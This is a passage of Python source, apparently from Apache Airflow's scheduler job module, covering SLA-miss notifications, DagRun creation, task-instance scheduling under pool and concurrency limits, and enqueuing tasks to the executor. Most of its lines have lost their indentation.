if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
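    # Illustrative sketch (not part of the scheduler): manage_slas() only acts on DAGs whose
    # tasks define an ``sla``, calling ``sla_miss_callback`` and emailing ``task.email`` when a
    # task instance finishes later than its schedule plus the SLA. A DAG opting in might look
    # like the following (hypothetical names, shown only to tie the pieces above together):
    #
    #     def notify_sla_miss(dag, task_list, blocking_task_list, slas, blocking_tis):
    #         print('SLA missed for:\n' + task_list)
    #
    #     dag = DAG('example_sla_dag', schedule_interval='@hourly',
    #               default_args={'email': ['ops@example.com']},
    #               sla_miss_callback=notify_sla_miss)
    #     BashOperator(task_id='report', bash_command='make report',
    #                  sla=timedelta(minutes=30), dag=dag)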
@staticmethod
def update_import_errors(session, dagbag):
"""
        For the DAGs in the given DagBag, record any associated import errors and clear
        errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
)
)
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
            # don't do scheduler catchup for DAGs that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = 0
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if active_dag_runs >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
active_dag_runs += 1
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs (if CHECK_SLAS config enabled).
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: List[airflow.models.DAG]
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
check_slas = conf.getboolean('core', 'CHECK_SLAS', fallback=True)
        for dag in dags:
            dag_id = dag.dag_id
            dag = dagbag.get_dag(dag_id)
            if not dag:
                self.log.error("DAG ID %s was not found in the DagBag", dag_id)
                continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag:
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
if check_slas:
self.manage_slas(dag)
def _find_dags_to_process(self, dags: List[DAG], paused_dag_ids: Set[str]):
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:param paused_dag_ids: paused DAG IDs
:return: DAGs to process
"""
if len(self.dag_ids) > 0:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dags
if dag.dag_id not in paused_dag_ids]
return dags
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param zombies: zombie task instances to kill.
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
        :param pickle_dags: whether to serialize the DAGs found in the file and
            save them to the DB
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
        :rtype: Tuple[List[airflow.utils.dag_processing.SimpleDag], int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = {dag.dag_id for dag in dagbag.dags.values() if dag.is_paused}
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
dags = self._find_dags_to_process(dagbag.dags.values(), paused_dag_ids)
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
refreshed_tis = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
# Refresh all task instances that will be scheduled
TI = models.TaskInstance
filter_for_tis = TI.filter_for_tis(ti_keys_to_schedule)
if filter_for_tis is not None:
refreshed_tis = session.query(TI).filter(filter_for_tis).with_for_update().all()
for ti in refreshed_tis:
# Add task to task instance
dag = dagbag.dags[ti.key[0]]
ti.task = dag.get_task(ti.key[1])
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
        We define alive as being in the RUNNING state and having sent a heartbeat within the
        threshold defined by the ``scheduler_health_check_threshold`` config setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
        normally should not happen, but it can if the state of DagRuns is
        changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state}, synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
        :return: a map from dag_id to # of task instances in the given state list and
            a map from (dag_id, task_id) to # of task instances in the given state list
        :rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
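    # For example (illustrative values only), with three running/queued task instances the two
    # maps returned above might look like:
    #     dag_map  == {'example_dag': 3}
    #     task_map == {('example_dag', 'extract'): 2, ('example_dag', 'load'): 1}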
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if states:
if None in states:
if all(x is None for x in states):
ti_query = ti_query.filter(TI.state == None) # noqa pylint: disable=singleton-comparison
else:
not_none_states = [state for state in states if state]
ti_query = ti_query.filter(
or_(TI.state == None, # noqa: E711 pylint: disable=singleton-comparison
TI.state.in_(not_none_states))
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
        # so these don't expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if acceptable_states:
if None in acceptable_states:
if all(x is None for x in acceptable_states):
ti_query = ti_query.filter(TI.state == None) # noqa pylint: disable=singleton-comparison
else:
not_none_acceptable_states = [state for state in acceptable_states if state]
ti_query = ti_query.filter(
or_(TI.state == None, # noqa pylint: disable=singleton-comparison
TI.state.in_(not_none_acceptable_states))
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_queued)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow()}, synchronize_session=False
)
session.commit()
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in tis_to_set_to_queued]
task_instance_str = "\n\t".join([repr(x) for x in tis_to_set_to_queued])
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
        :param simple_dag_bag: Should contain all of the task_instances' DAGs
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
        and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
        :return: number of task instances whose state was changed
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
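    # ``helpers.reduce_in_chunks(fn, iterable, initializer, chunk_size)`` folds ``fn`` over the
    # iterable one chunk at a time, so at most ``max_tis_per_query`` TIs are queued per commit.
    # A rough stand-in for the behaviour relied on here (not the actual
    # airflow.utils.helpers implementation) would be:
    #
    #     def reduce_in_chunks(fn, iterable, initializer, chunk_size):
    #         acc = initializer
    #         for start in range(0, len(iterable), chunk_size):
    #             acc = fn(acc, iterable[start:start + chunk_size])
    #         return acc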
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
                    # TI.try_number returns the raw try_number + 1 while the TI is not
                    # running, so subtract 1 here to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
                if not ti:
                    self.log.warning("TaskInstance %s.%s (%s) went missing from the database",
                                     dag_id, task_id, execution_date)
                    continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in (LocalExecutor, SequentialExecutor):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_id_white_list=self.dag_ids,
zombies=zombies
)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
